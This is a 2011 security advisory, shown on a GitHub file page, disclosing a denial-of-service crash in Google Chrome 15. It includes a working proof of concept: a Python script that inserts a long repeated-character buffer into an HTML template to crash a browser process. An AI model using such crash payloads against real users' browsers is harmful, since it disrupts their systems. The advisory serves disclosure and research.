-
Notifications
You must be signed in to change notification settings - Fork 8
/
Copy pathnullsec-chrome.txt
120 lines (69 loc) · 2.56 KB
/
nullsec-chrome.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
===============================================================================
| |
____ _ __
___ __ __/ / /__ ___ ______ ______(_) /___ __
/ _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
/_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
/___/ team
PUBLIC SECURITY ADVISORY
| |
===============================================================================
TITLE
=====
Google Chrome PoC, killing process. (DoS)
AUTHOR
======
pigtail23
DATE
====
10-22-2011
VENDOR
======
Chrome - http://www.google.com/chrome
AFFECTED PRODUCT
================
Google Chrome <= 15.0.874.106
AFFECTED PLATFORMS
==================
Windows XP, Vista, 7
VULNERABILITY CLASS
===================
Denial of Service
DESCRIPTION
===========
It seems this is a stack overflow. No way to exploit it.
PROOF OF CONCEPT
================
Python script for debugging:
--- SNIP ---
#!/usr/bin/python
filename = 'poc.html'
content = open('template.html', 'r').read()
buff = '$$*' * 36800
rc = 484
content2 = content[:rc] + buff + content[rc:]
FILE = open(filename,"w")
FILE.write(content2)
FILE.close()
template.html:
<html>
<body>
<script>(function(){var d=document;if(!("autofocus" in d.createElement("input"))){try{d.getElementById("yschsp").focus();}catch(e){}}data={"assist":{"url":"http:\/\/www.google.com","maxLength":38,"linkStem":"http:\/\/www.remoteshell.de","settingsUrl":"http:\/\/www.chrooome.xxx","strings":{"searchbox_title":"bam","settings_text":"bam","gossip_desc":"bam","scroll_up":"bam","scroll_down":"bam","aria_available_suggestions":"bam","aria_no_suggestion_available":"bam"}}};window.onload=function(){var h=d.getElementsByTagName("head")[0],o=d.createElement("script");o.src="http://www.0__o";h.appendChild(o);};}());</script>
</body>
</html>
--- SNIP ---
IMPACT
======
You can only provoke a crash of a Google Chrome process.
THREAT LEVEL
============
LOW
STATUS
======
Not fixed.
DISCLAIMER
==========
nullsecurity.net hereby emphasize, that the information which is published here are
for education purposes only. nullsecurity.net does not take any responsibility for
any abuse or misusage!
Copyright (c) 2011 - nullsecurity.net